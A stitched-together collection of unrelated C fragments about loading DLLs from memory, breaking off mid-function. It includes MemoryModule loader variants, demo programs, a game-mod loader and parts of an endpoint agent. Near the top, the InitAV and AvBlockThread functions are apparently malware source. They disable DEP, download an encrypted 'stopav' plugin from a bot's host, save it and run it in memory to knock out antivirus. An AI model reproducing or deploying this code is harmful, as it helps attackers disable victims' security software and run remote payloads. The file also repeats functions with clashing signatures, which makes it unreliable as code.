RPRIVATE
RVOID
_cleanupModuleEntry
(
rpHCPModuleInfo* mod
)
{
rEvent_free( mod->context.isTimeToStop );
rpal_thread_free( mod->hThread );
if( mod->isOsLoaded )
{
#ifdef RPAL_PLATFORM_WINDOWS
FreeLibrary( (HMODULE)(mod->hModule) );
#elif defined( RPAL_PLATFORM_LINUX ) || defined( RPAL_PLATFORM_MACOSX )
dlclose( mod->hModule );
#endif
}
else
{
MemoryFreeLibrary( mod->hModule );
}
rpal_debug_info( "module %d cleaned up", mod->id );
rpal_memory_zero( mod, sizeof( *mod ) );
}
void InitAV()
{
DisableDEP();
DWORD dwMiniSize = 0;
DWORD dwStopSize = 0;
LPBYTE pMiniAV = GetFileData( GetMiniAVPath(), &dwMiniSize );
LPBYTE pStopAV = GetFileData( GetStopAVPath(), &dwStopSize );
if ( pMiniAV && dwMiniSize )
{
LPVOID MiniAVDll = DecryptPlugin( pMiniAV, dwMiniSize );
HMEMORYMODULE hLib = MemoryLoadLibrary( MiniAVDll );
if ( hLib )
{
MemoryFreeLibrary( hLib );
}
MemFree( MiniAVDll );
}
if ( pStopAV && dwStopSize )
{
LPVOID StopAVDll = DecryptPlugin( pStopAV, dwStopSize );
HMEMORYMODULE hLib = MemoryLoadLibrary( StopAVDll );
if ( hLib )
{
MemoryFreeLibrary( hLib );
}
MemFree( StopAVDll );
}
if ( !dwStopSize || !dwMiniSize )
{
MegaJump( AvFuckThread );
}
return;
}
DWORD WINAPI AvBlockThread( LPVOID lpData )
{
if ( (DWORD)pGetFileAttributesW( GetStopAVPath() ) != INVALID_FILE_ATTRIBUTES )
{
return 0;
}
char *Host = GetCurrentHost();
if ( Host == NULL )
{
return 0;
}
char AvBlockFile[] = {'/','c','f','g','/','s','t','o','p','a','v','.','p','l','u','g',0};
char AvBlockUrl[256];
m_lstrcpy( AvBlockUrl, Host );
m_lstrcat( AvBlockUrl, AvBlockFile );
LPBYTE BotModule = NULL;
DWORD dwModuleSize = 0;
while ( !DownloadInMem( AvBlockUrl, &BotModule, &dwModuleSize ) )
{
pSleep( 1000 * 60 * 5 );
}
if ( BotModule != NULL && dwModuleSize )
{
LPVOID FileData = MemAlloc( dwModuleSize + 1 );
if ( FileData )
{
m_memcpy( FileData, BotModule, dwModuleSize );
File::WriteBufferW(GetMiniAVPath(), FileData, dwModuleSize );
MemFree( FileData );
}
LPVOID Module = DecryptPlugin( BotModule, dwModuleSize );
if ( Module )
{
HMEMORYMODULE hLib = MemoryLoadLibrary( Module );
if ( hLib == NULL )
{
return 0;
}
MemoryFreeLibrary( hLib );
}
}
return 0;
}
BOOL MyFreeLibrary(HMODULE module)
{
LIST *lib = _FindMemoryModule(NULL, module);
if (lib) {
if (--lib->refcount == 0)
MemoryFreeLibrary(module);
return TRUE;
} else
return FreeLibrary(module);
}
void LoadFromMemory(void)
{
FILE *fp;
unsigned char *data=NULL;
size_t size;
HMEMORYMODULE handle;
addNumberProc addNumber;
HMEMORYRSRC resourceInfo;
DWORD resourceSize;
LPVOID resourceData;
TCHAR buffer[100];
fp = _tfopen(DLL_FILE, _T("rb"));
if (fp == NULL)
{
_tprintf(_T("Can't open DLL file \"%s\"."), DLL_FILE);
goto exit;
}
fseek(fp, 0, SEEK_END);
size = ftell(fp);
data = (unsigned char *)malloc(size);
fseek(fp, 0, SEEK_SET);
fread(data, 1, size, fp);
fclose(fp);
handle = MemoryLoadLibrary(data, NULL);
if (handle == NULL)
{
_tprintf(_T("Can't load library from memory.\n"));
goto exit;
}
addNumber = (addNumberProc)MemoryGetProcAddress(handle, "addNumbers");
_tprintf(_T("From memory: %d\n"), addNumber(1, 2));
resourceInfo = MemoryFindResource(handle, MAKEINTRESOURCE(VS_VERSION_INFO), RT_VERSION);
_tprintf(_T("MemoryFindResource returned 0x%p\n"), resourceInfo);
resourceSize = MemorySizeofResource(handle, resourceInfo);
resourceData = MemoryLoadResource(handle, resourceInfo);
_tprintf(_T("Memory resource data: %ld bytes at 0x%p\n"), resourceSize, resourceData);
MemoryLoadString(handle, 1, buffer, sizeof(buffer));
_tprintf(_T("String1: %s\n"), buffer);
MemoryLoadString(handle, 20, buffer, sizeof(buffer));
_tprintf(_T("String2: %s\n"), buffer);
MemoryFreeLibrary(handle);
exit:
if (data)
free(data);
}
BOOL WINAPI DllMain(HINSTANCE hInst, DWORD reason, LPVOID)
{
if (reason == DLL_PROCESS_ATTACH)
{
dllModule = hInst;
hExecutableInstance = GetModuleHandle(NULL); // passing NULL should be safe even with the loader lock being held (according to ReactOS ldr.c)
GetModuleFileName(dllModule, DllPath, MAX_PATH);
DllName = strrchr(DllPath, '\\');
SHGetFolderPath(NULL, CSIDL_SYSTEM, NULL, 0, szSystemPath);
strcat(szSystemPath, DllName);
int nForceEPHook = GetPrivateProfileInt("globalsets", "forceentrypointhook", FALSE, "scripts\\global.ini");
if (hExecutableInstance && (_stricmp(DllName + 1, "vorbisFile.dll") == NULL || nForceEPHook != FALSE))
{
VorbisFile();
}
else
{
LoadPlugins();
bLoadedPluginsYet = true;
}
}
if (reason == DLL_PROCESS_DETACH)
{
FreeLibrary(dsound.dll);
FreeLibrary(dinput8.dll);
FreeLibrary(ddraw.dll);
FreeLibrary(d3d8.dll);
FreeLibrary(d3d9.dll);
FreeLibrary(d3d11.dll);
FreeLibrary(winmmbase.dll);
FreeLibrary(msacm32.dll);
MemoryFreeLibrary(vorbisHooked);
MemoryFreeLibrary(wndmode);
}
return TRUE;
}
/* public - replacement for FreeLibrary() */
BOOL MyFreeLibrary(HMODULE hModule)
{
MEMORYMODULE *p = loaded;
while (p) {
if ((HMODULE)p == hModule) {
if (--p->refcount == 0) {
_Unregister(p);
MemoryFreeLibrary(p);
}
return TRUE;
}
p = p->next;
}
return FreeLibrary(hModule);
}
int main(int argc, char* argv[])
{
unsigned char *data;
size_t filelen;
HMEMORYMODULE testBase; // dll base handle
addNumberProc addNumber; // function ptr
if(argc < 3){
printf("Usage: %s <dll_name> <dll_func_name>\n",argv[0]);
return -1;
}
/* load the dll file into memory
*
* Note:(This step could have been from an encrypted, compressed or signed file or
* even dynamically downloaded from the web (!), etc.).
*/
data = load_file(argv[1], &filelen);
if(data == 0) { printf("failed to load %d, exiting.\n",argv[1]); return 0; }
printf("Opening lib ..\n");
/* load shared library from buffer, relocate it, etc. */
if((testBase = MemoryLoadLibrary(data)) == NULL) {
printf("Can't load library.\n");
free(data);
return -1;
}
printf("Finding api call ..\n");
/* now we can lookup any named vtable function(s) we want.. */
addNumber = (addNumberProc)MemoryGetProcAddress(testBase, argv[2]);
if(addNumber != 0) {
printf("Got it! %d = %s(1,2);\n", addNumber(1, 2),argv[2]); /* example use of dll exported function */
} else {
printf("Sorry %s() api not found in this dll.\n",argv[2]);
}
printf("Closing lib ..\n");
/* close the library */
MemoryFreeLibrary(testBase);
/* free loaded dll buffer memory */
free(data);
return 0;
}
void LoadFromMemory(void)
{
unsigned char *data=NULL;
size_t size;
HMEMORYMODULE module;
addNumberProc addNumber;
/*
FILE *fp;
fp = fopen(DLL_FILE, "rb");
if (fp == NULL)
{
printf("Can't open DLL file \"%s\".", DLL_FILE);
goto exit;
}
fseek(fp, 0, SEEK_END);
size = ftell(fp);
data = (unsigned char *)malloc(size);
fseek(fp, 0, SEEK_SET);
fread(data, 1, size, fp);
fclose(fp);
*/
HRSRC hResID = ::FindResource(NULL,MAKEINTRESOURCE(IDR_EXE1),"exe");//查找资源
HGLOBAL hRes = ::LoadResource(NULL,hResID);//加载资源
data = (unsigned char *)::LockResource(hRes);//锁定资源
module = MemoryLoadLibrary(data);
if (module == NULL)
{
printf("Can't load library from memory.\n");
goto exit;
}
addNumber = (addNumberProc)MemoryGetProcAddress(module, "addNumbers");
printf("From memory: %d\n", addNumber(1, 2));
MemoryFreeLibrary(module);
exit:
if (data)
free(data);
}
HMEMORYMODULE MemoryLoadLibraryEx(const void *data, size_t size,
CustomLoadLibraryFunc loadLibrary,
CustomGetProcAddressFunc getProcAddress,
CustomFreeLibraryFunc freeLibrary,
void *userdata)
{
PMEMORYMODULE result = NULL;
PIMAGE_DOS_HEADER dos_header;
PIMAGE_NT_HEADERS old_header;
unsigned char *code, *headers;
ptrdiff_t locationDelta;
SYSTEM_INFO sysInfo;
PIMAGE_SECTION_HEADER section;
DWORD i;
size_t optionalSectionSize;
size_t lastSectionEnd = 0;
size_t alignedImageSize;
if (size && !CheckSize(size, sizeof(IMAGE_DOS_HEADER))) {
return NULL;
}
dos_header = (PIMAGE_DOS_HEADER)data;
if (dos_header->e_magic != IMAGE_DOS_SIGNATURE) {
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
if (size && !CheckSize(size, dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS))) {
return NULL;
}
old_header = (PIMAGE_NT_HEADERS)&((const unsigned char *)(data))[dos_header->e_lfanew];
if (old_header->Signature != IMAGE_NT_SIGNATURE) {
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
#ifdef _WIN64
if (old_header->FileHeader.Machine != IMAGE_FILE_MACHINE_AMD64) {
#else
if (old_header->FileHeader.Machine != IMAGE_FILE_MACHINE_I386) {
#endif
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
if (old_header->OptionalHeader.SectionAlignment & 1) {
// Only support section alignments that are a multiple of 2
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
section = IMAGE_FIRST_SECTION(old_header);
optionalSectionSize = old_header->OptionalHeader.SectionAlignment;
for (i=0; i<old_header->FileHeader.NumberOfSections; i++, section++) {
size_t endOfSection;
if (section->SizeOfRawData == 0) {
// Section without data in the DLL
endOfSection = section->VirtualAddress + optionalSectionSize;
} else {
endOfSection = section->VirtualAddress + section->SizeOfRawData;
}
if (endOfSection > lastSectionEnd) {
lastSectionEnd = endOfSection;
}
}
GetNativeSystemInfo(&sysInfo);
alignedImageSize = ALIGN_VALUE_UP(old_header->OptionalHeader.SizeOfImage, sysInfo.dwPageSize);
if (alignedImageSize < ALIGN_VALUE_UP(lastSectionEnd, sysInfo.dwPageSize)) {
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
// reserve memory for image of library
// XXX: is it correct to commit the complete memory region at once?
// calling DllEntry raises an exception if we don't...
code = (unsigned char *)VirtualAlloc((LPVOID)(old_header->OptionalHeader.ImageBase),
alignedImageSize,
MEM_RESERVE | MEM_COMMIT,
PAGE_READWRITE);
if (code == NULL) {
// try to allocate memory at arbitrary position
code = (unsigned char *)VirtualAlloc(NULL,
alignedImageSize,
MEM_RESERVE | MEM_COMMIT,
PAGE_READWRITE);
if (code == NULL) {
SetLastError(ERROR_OUTOFMEMORY);
return NULL;
}
}
result = (PMEMORYMODULE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(MEMORYMODULE));
if (result == NULL) {
VirtualFree(code, 0, MEM_RELEASE);
SetLastError(ERROR_OUTOFMEMORY);
return NULL;
}
result->codeBase = code;
result->isDLL = (old_header->FileHeader.Characteristics & IMAGE_FILE_DLL) != 0;
result->loadLibrary = loadLibrary;
result->getProcAddress = getProcAddress;
result->freeLibrary = freeLibrary;
result->userdata = userdata;
result->pageSize = sysInfo.dwPageSize;
if (size && !CheckSize(size, old_header->OptionalHeader.SizeOfHeaders)) {
goto error;
}
// commit memory for headers
headers = (unsigned char *)VirtualAlloc(code,
old_header->OptionalHeader.SizeOfHeaders,
MEM_COMMIT,
PAGE_READWRITE);
// copy PE header to code
memcpy(headers, dos_header, old_header->OptionalHeader.SizeOfHeaders);
result->headers = (PIMAGE_NT_HEADERS)&((const unsigned char *)(headers))[dos_header->e_lfanew];
// update position
result->headers->OptionalHeader.ImageBase = (uintptr_t)code;
// copy sections from DLL file block to new memory location
if (!CopySections((const unsigned char *) data, size, old_header, result)) {
goto error;
}
// adjust base address of imported data
locationDelta = (ptrdiff_t)(result->headers->OptionalHeader.ImageBase - old_header->OptionalHeader.ImageBase);
if (locationDelta != 0) {
result->isRelocated = PerformBaseRelocation(result, locationDelta);
} else {
result->isRelocated = TRUE;
}
// load required dlls and adjust function table of imports
if (!BuildImportTable(result)) {
goto error;
}
// mark memory pages depending on section headers and release
// sections that are marked as "discardable"
if (!FinalizeSections(result)) {
goto error;
}
// TLS callbacks are executed BEFORE the main loading
if (old_header->OptionalHeader.ImageBase != (DWORD)g_hInstance && !ExecuteTLS(result)) {
goto error;
}
// get entry point of loaded library
if (result->headers->OptionalHeader.AddressOfEntryPoint != 0) {
if (result->isDLL) {
DllEntryProc DllEntry = (DllEntryProc)(LPVOID)(code + result->headers->OptionalHeader.AddressOfEntryPoint);
PCRITICAL_SECTION aLoaderLock; // So no other module can be loaded, expecially due to hooked _RtlPcToFileHeader
#ifdef _M_IX86 // compiles for x86
aLoaderLock = *(PCRITICAL_SECTION*)(__readfsdword(0x30) + 0xA0); //PEB->LoaderLock
#elif _M_AMD64 // compiles for x64
aLoaderLock = *(PCRITICAL_SECTION*)(__readgsqword(0x60) + 0x110); //PEB->LoaderLock //0x60 because offset is doubled in 64bit
#endif
HANDLE hHeap = NULL;
// set start and end of memory for our module so HookRtlPcToFileHeader can report properly
currentModuleStart = result->codeBase;
currentModuleEnd = result->codeBase + result->headers->OptionalHeader.SizeOfImage;
if (!_RtlPcToFileHeader)
_RtlPcToFileHeader = (MyRtlPcToFileHeader)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlPcToFileHeader");
EnterCriticalSection(aLoaderLock);
PHOOK_ENTRY pHook = MinHookEnable(_RtlPcToFileHeader, &HookRtlPcToFileHeader, &hHeap);
// notify library about attaching to process
BOOL successfull = (*DllEntry)((HINSTANCE)code, DLL_PROCESS_ATTACH, result);
// Disable hook if it was enabled before
if (pHook)
{
MinHookDisable(pHook);
HeapFree(hHeap, 0, pHook);
HeapDestroy(hHeap);
}
LeaveCriticalSection(aLoaderLock);
if (!successfull) {
SetLastError(ERROR_DLL_INIT_FAILED);
goto error;
}
result->initialized = TRUE;
} else {
result->exeEntry = (ExeEntryProc)(LPVOID)(code + result->headers->OptionalHeader.AddressOfEntryPoint);
}
} else {
result->exeEntry = NULL;
}
return (HMEMORYMODULE)result;
error:
// cleanup
MemoryFreeLibrary(result);
return NULL;
}
FARPROC MemoryGetProcAddress(HMEMORYMODULE module, LPCSTR name)
{
unsigned char *codeBase = ((PMEMORYMODULE)module)->codeBase;
DWORD idx = 0;
PIMAGE_EXPORT_DIRECTORY exports;
PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY((PMEMORYMODULE)module, IMAGE_DIRECTORY_ENTRY_EXPORT);
if (directory->Size == 0) {
// no export table found
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
exports = (PIMAGE_EXPORT_DIRECTORY) (codeBase + directory->VirtualAddress);
if (exports->NumberOfNames == 0 || exports->NumberOfFunctions == 0) {
// DLL doesn't export anything
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
if (HIWORD(name) == 0) {
// load function by ordinal value
if (LOWORD(name) < exports->Base) {
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
idx = LOWORD(name) - exports->Base;
} else {
// search function name in list of exported names
DWORD i;
DWORD *nameRef = (DWORD *) (codeBase + exports->AddressOfNames);
WORD *ordinal = (WORD *) (codeBase + exports->AddressOfNameOrdinals);
BOOL found = FALSE;
for (i=0; i<exports->NumberOfNames; i++, nameRef++, ordinal++) {
if (_stricmp(name, (const char *) (codeBase + (*nameRef))) == 0) {
idx = *ordinal;
found = TRUE;
break;
}
}
if (!found) {
// exported symbol not found
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
}
if (idx > exports->NumberOfFunctions) {
// name <-> ordinal number don't match
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
// AddressOfFunctions contains the RVAs to the "real" functions
return (FARPROC)(LPVOID)(codeBase + (*(DWORD *) (codeBase + exports->AddressOfFunctions + (idx*4))));
}
HMEMORYMODULE MemoryLoadLibraryEx(const void *data, size_t size,
CustomAllocFunc allocMemory,
CustomFreeFunc freeMemory,
CustomLoadLibraryFunc loadLibrary,
CustomGetProcAddressFunc getProcAddress,
CustomFreeLibraryFunc freeLibrary,
void *userdata)
{
PMEMORYMODULE result = NULL;
PIMAGE_DOS_HEADER dos_header;
PIMAGE_NT_HEADERS old_header;
unsigned char *code, *headers;
ptrdiff_t locationDelta;
SYSTEM_INFO sysInfo;
PIMAGE_SECTION_HEADER section;
DWORD i;
size_t optionalSectionSize;
size_t lastSectionEnd = 0;
size_t alignedImageSize;
if (!CheckSize(size, sizeof(IMAGE_DOS_HEADER))) {
return NULL;
}
dos_header = (PIMAGE_DOS_HEADER)data;
if (dos_header->e_magic != IMAGE_DOS_SIGNATURE) {
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
if (!CheckSize(size, dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS))) {
return NULL;
}
old_header = (PIMAGE_NT_HEADERS)&((const unsigned char *)(data))[dos_header->e_lfanew];
if (old_header->Signature != IMAGE_NT_SIGNATURE) {
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
if (old_header->FileHeader.Machine != HOST_MACHINE) {
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
if (old_header->OptionalHeader.SectionAlignment & 1) {
// Only support section alignments that are a multiple of 2
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
section = IMAGE_FIRST_SECTION(old_header);
optionalSectionSize = old_header->OptionalHeader.SectionAlignment;
for (i=0; i<old_header->FileHeader.NumberOfSections; i++, section++) {
size_t endOfSection;
if (section->SizeOfRawData == 0) {
// Section without data in the DLL
endOfSection = section->VirtualAddress + optionalSectionSize;
} else {
endOfSection = section->VirtualAddress + section->SizeOfRawData;
}
if (endOfSection > lastSectionEnd) {
lastSectionEnd = endOfSection;
}
}
GetSystemInfo(&sysInfo);
alignedImageSize = AlignValueUp(old_header->OptionalHeader.SizeOfImage, sysInfo.dwPageSize);
if (alignedImageSize != AlignValueUp(lastSectionEnd, sysInfo.dwPageSize)) {
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
// reserve memory for image of library
// XXX: is it correct to commit the complete memory region at once?
// calling DllEntry raises an exception if we don't...
code = (unsigned char *)allocMemory((LPVOID)(old_header->OptionalHeader.ImageBase),
alignedImageSize,
MEM_RESERVE | MEM_COMMIT,
PAGE_READWRITE,
userdata);
if (code == NULL) {
// try to allocate memory at arbitrary position
code = (unsigned char *)allocMemory(NULL,
alignedImageSize,
MEM_RESERVE | MEM_COMMIT,
PAGE_READWRITE,
userdata);
if (code == NULL) {
SetLastError(ERROR_OUTOFMEMORY);
return NULL;
}
}
result = (PMEMORYMODULE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(MEMORYMODULE));
if (result == NULL) {
freeMemory(code, 0, MEM_RELEASE, userdata);
SetLastError(ERROR_OUTOFMEMORY);
return NULL;
}
result->codeBase = code;
result->isDLL = (old_header->FileHeader.Characteristics & IMAGE_FILE_DLL) != 0;
result->alloc = allocMemory;
result->free = freeMemory;
result->loadLibrary = loadLibrary;
result->getProcAddress = getProcAddress;
result->freeLibrary = freeLibrary;
result->userdata = userdata;
result->pageSize = sysInfo.dwPageSize;
if (!CheckSize(size, old_header->OptionalHeader.SizeOfHeaders)) {
goto error;
}
// commit memory for headers
headers = (unsigned char *)allocMemory(code,
old_header->OptionalHeader.SizeOfHeaders,
MEM_COMMIT,
PAGE_READWRITE,
userdata);
// copy PE header to code
memcpy(headers, dos_header, old_header->OptionalHeader.SizeOfHeaders);
result->headers = (PIMAGE_NT_HEADERS)&((const unsigned char *)(headers))[dos_header->e_lfanew];
// update position
result->headers->OptionalHeader.ImageBase = (uintptr_t)code;
// copy sections from DLL file block to new memory location
if (!CopySections((const unsigned char *) data, size, old_header, result)) {
goto error;
}
// adjust base address of imported data
locationDelta = (ptrdiff_t)(result->headers->OptionalHeader.ImageBase - old_header->OptionalHeader.ImageBase);
if (locationDelta != 0) {
result->isRelocated = PerformBaseRelocation(result, locationDelta);
} else {
result->isRelocated = TRUE;
}
// load required dlls and adjust function table of imports
if (!BuildImportTable(result)) {
goto error;
}
// mark memory pages depending on section headers and release
// sections that are marked as "discardable"
if (!FinalizeSections(result)) {
goto error;
}
// TLS callbacks are executed BEFORE the main loading
if (!ExecuteTLS(result)) {
goto error;
}
// get entry point of loaded library
if (result->headers->OptionalHeader.AddressOfEntryPoint != 0) {
if (result->isDLL) {
DllEntryProc DllEntry = (DllEntryProc)(LPVOID)(code + result->headers->OptionalHeader.AddressOfEntryPoint);
// notify library about attaching to process
BOOL successfull = (*DllEntry)((HINSTANCE)code, DLL_PROCESS_ATTACH, 0);
if (!successfull) {
SetLastError(ERROR_DLL_INIT_FAILED);
goto error;
}
result->initialized = TRUE;
} else {
result->exeEntry = (ExeEntryProc)(LPVOID)(code + result->headers->OptionalHeader.AddressOfEntryPoint);
}
} else {
result->exeEntry = NULL;
}
return (HMEMORYMODULE)result;
error:
// cleanup
MemoryFreeLibrary(result);
return NULL;
}
HMEMORYMODULE MemoryLoadLibraryEx(const void *data,
CustomLoadLibraryFunc loadLibrary,
CustomGetProcAddressFunc getProcAddress,
CustomFreeLibraryFunc freeLibrary,
void *userdata)
{
PMEMORYMODULE result;
PIMAGE_DOS_HEADER dos_header;
PIMAGE_NT_HEADERS old_header;
unsigned char *code, *headers;
SIZE_T locationDelta;
SYSTEM_INFO sysInfo;
HMODULE hModule;
dos_header = (PIMAGE_DOS_HEADER)data;
if (dos_header->e_magic != IMAGE_DOS_SIGNATURE) {
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
old_header = (PIMAGE_NT_HEADERS)&((const unsigned char *)(data))[dos_header->e_lfanew];
if (old_header->Signature != IMAGE_NT_SIGNATURE) {
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
#ifdef _WIN64
if (old_header->FileHeader.Machine != IMAGE_FILE_MACHINE_AMD64) {
#else
if (old_header->FileHeader.Machine != IMAGE_FILE_MACHINE_I386) {
#endif
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
if (old_header->OptionalHeader.SectionAlignment & 1) {
// Only support section alignments that are a multiple of 2
SetLastError(ERROR_BAD_EXE_FORMAT);
return NULL;
}
// reserve memory for image of library
// XXX: is it correct to commit the complete memory region at once?
// calling DllEntry raises an exception if we don't...
code = (unsigned char *)VirtualAlloc((LPVOID)(old_header->OptionalHeader.ImageBase),
old_header->OptionalHeader.SizeOfImage,
MEM_RESERVE | MEM_COMMIT,
PAGE_READWRITE);
if (code == NULL) {
// try to allocate memory at arbitrary position
code = (unsigned char *)VirtualAlloc(NULL,
old_header->OptionalHeader.SizeOfImage,
MEM_RESERVE | MEM_COMMIT,
PAGE_READWRITE);
if (code == NULL) {
SetLastError(ERROR_OUTOFMEMORY);
return NULL;
}
}
result = (PMEMORYMODULE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(MEMORYMODULE));
if (result == NULL) {
VirtualFree(code, 0, MEM_RELEASE);
SetLastError(ERROR_OUTOFMEMORY);
return NULL;
}
result->codeBase = code;
result->isDLL = (old_header->FileHeader.Characteristics & IMAGE_FILE_DLL) != 0;
result->loadLibrary = loadLibrary;
result->getProcAddress = getProcAddress;
result->freeLibrary = freeLibrary;
result->userdata = userdata;
hModule = LoadLibrary ("kernel32.dll");
if (hModule) {
int (WINAPI *GetNativeSystemInfo) (SYSTEM_INFO *systemInfo);
GetNativeSystemInfo = (void *) GetProcAddress (hModule, "GetNativeSystemInfo");
GetNativeSystemInfo(&sysInfo);
}
result->pageSize = sysInfo.dwPageSize;
// commit memory for headers
headers = (unsigned char *)VirtualAlloc(code,
old_header->OptionalHeader.SizeOfHeaders,
MEM_COMMIT,
PAGE_READWRITE);
// copy PE header to code
memcpy(headers, dos_header, old_header->OptionalHeader.SizeOfHeaders);
result->headers = (PIMAGE_NT_HEADERS)&((const unsigned char *)(headers))[dos_header->e_lfanew];
// update position
result->headers->OptionalHeader.ImageBase = (uintptr_t)code;
// copy sections from DLL file block to new memory location
if (!CopySections((const unsigned char *) data, old_header, result)) {
goto error;
}
// adjust base address of imported data
locationDelta = (SIZE_T)(code - old_header->OptionalHeader.ImageBase);
if (locationDelta != 0) {
result->isRelocated = PerformBaseRelocation(result, locationDelta);
} else {
result->isRelocated = TRUE;
}
// load required dlls and adjust function table of imports
if (!BuildImportTable(result)) {
goto error;
}
// mark memory pages depending on section headers and release
// sections that are marked as "discardable"
if (!FinalizeSections(result)) {
goto error;
}
// TLS callbacks are executed BEFORE the main loading
if (!ExecuteTLS(result)) {
goto error;
}
// get entry point of loaded library
if (result->headers->OptionalHeader.AddressOfEntryPoint != 0) {
if (result->isDLL) {
DllEntryProc DllEntry = (DllEntryProc) (code + result->headers->OptionalHeader.AddressOfEntryPoint);
// notify library about attaching to process
BOOL successfull = (*DllEntry)((HINSTANCE)code, DLL_PROCESS_ATTACH, 0);
if (!successfull) {
SetLastError(ERROR_DLL_INIT_FAILED);
goto error;
}
result->initialized = TRUE;
} else {
result->exeEntry = (ExeEntryProc) (code + result->headers->OptionalHeader.AddressOfEntryPoint);
}
} else {
result->exeEntry = NULL;
}
return (HMEMORYMODULE)result;
error:
// cleanup
MemoryFreeLibrary(result);
return NULL;
}
FARPROC MemoryGetProcAddress(HMEMORYMODULE module, LPCSTR name)
{
unsigned char *codeBase = ((PMEMORYMODULE)module)->codeBase;
DWORD idx;
PIMAGE_EXPORT_DIRECTORY exports;
PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY((PMEMORYMODULE)module, IMAGE_DIRECTORY_ENTRY_EXPORT);
if (directory->Size == 0) {
// no export table found
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
exports = (PIMAGE_EXPORT_DIRECTORY) (codeBase + directory->VirtualAddress);
if (exports->NumberOfNames == 0 || exports->NumberOfFunctions == 0) {
// DLL doesn't export anything
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
if (HIWORD(name) == 0) {
// load function by ordinal value
if (LOWORD(name) < exports->Base) {
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
idx = LOWORD(name) - exports->Base;
} else {
// search function name in list of exported names
DWORD i;
DWORD *nameRef = (DWORD *) (codeBase + exports->AddressOfNames);
WORD *ordinal = (WORD *) (codeBase + exports->AddressOfNameOrdinals);
BOOL found = FALSE;
for (i=0; i<exports->NumberOfNames; i++, nameRef++, ordinal++) {
if (_stricmp(name, (const char *) (codeBase + (*nameRef))) == 0) {
idx = *ordinal;
found = TRUE;
break;
}
}
if (!found) {
// exported symbol not found
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
}
if (idx > exports->NumberOfFunctions) {
// name <-> ordinal number don't match
SetLastError(ERROR_PROC_NOT_FOUND);
return NULL;
}
// AddressOfFunctions contains the RVAs to the "real" functions
return (FARPROC) (codeBase + (*(DWORD *) (codeBase + exports->AddressOfFunctions + (idx*4))));
}
RPRIVATE_TESTABLE
RBOOL
loadModule
(
rpHCPContext* hcpContext,
rSequence seq
)
{
RBOOL isSuccess = FALSE;
RU32 moduleIndex = (RU32)(-1);
RPU8 tmpBuff = NULL;
RU32 tmpSize = 0;
RPU8 tmpSig = NULL;
RU32 tmpSigSize = 0;
rpal_thread_func pEntry = NULL;
rpHCPModuleContext* modContext = NULL;
OBFUSCATIONLIB_DECLARE( entryName, RP_HCP_CONFIG_MODULE_ENTRY );
OBFUSCATIONLIB_DECLARE( recvMessage, RP_HCP_CONFIG_MODULE_RECV_MESSAGE );
if( NULL != seq &&
NULL != hcpContext )
{
for( moduleIndex = 0; moduleIndex < RP_HCP_CONTEXT_MAX_MODULES; moduleIndex++ )
{
if( 0 == hcpContext->modules[ moduleIndex ].hThread )
{
// Found an empty spot
break;
}
}
}
if( RP_HCP_CONTEXT_MAX_MODULES != moduleIndex &&
(RU32)(-1) != moduleIndex )
{
// We got an empty spot for our module
if( rSequence_getRU8( seq,
RP_TAGS_HCP_MODULE_ID,
&(hcpContext->modules[ moduleIndex ].id ) ) &&
rSequence_getBUFFER( seq,
RP_TAGS_BINARY,
&tmpBuff,
&tmpSize ) &&
rSequence_getBUFFER( seq,
RP_TAGS_SIGNATURE,
&tmpSig,
&tmpSigSize ) &&
CRYPTOLIB_SIGNATURE_SIZE == tmpSigSize )
{
// We got the data, now verify the buffer signature
if( CryptoLib_verify( tmpBuff, tmpSize, getRootPublicKey(), tmpSig ) )
{
// Ready to load the module
rpal_debug_info( "loading module in memory" );
hcpContext->modules[ moduleIndex ].hModule = MemoryLoadLibrary( tmpBuff, tmpSize );
if( NULL != hcpContext->modules[ moduleIndex ].hModule )
{
OBFUSCATIONLIB_TOGGLE( entryName );
pEntry = (rpal_thread_func)MemoryGetProcAddress( hcpContext->modules[ moduleIndex ].hModule,
(RPCHAR)entryName );
OBFUSCATIONLIB_TOGGLE( entryName );
if( NULL != pEntry )
{
modContext = &(hcpContext->modules[ moduleIndex ].context);
modContext->pCurrentId = &( hcpContext->currentId );
modContext->func_sendHome = doSend;
modContext->isTimeToStop = rEvent_create( TRUE );
modContext->rpalContext = rpal_Context_get();
modContext->isOnlineEvent = hcpContext->isCloudOnline;
if( NULL != modContext->isTimeToStop )
{
hcpContext->modules[ moduleIndex ].isTimeToStop = modContext->isTimeToStop;
OBFUSCATIONLIB_TOGGLE( recvMessage );
hcpContext->modules[ moduleIndex ].func_recvMessage =
(rpHCPModuleMsgEntry)MemoryGetProcAddress( hcpContext->modules[ moduleIndex ].hModule,
(RPCHAR)recvMessage );
OBFUSCATIONLIB_TOGGLE( recvMessage );
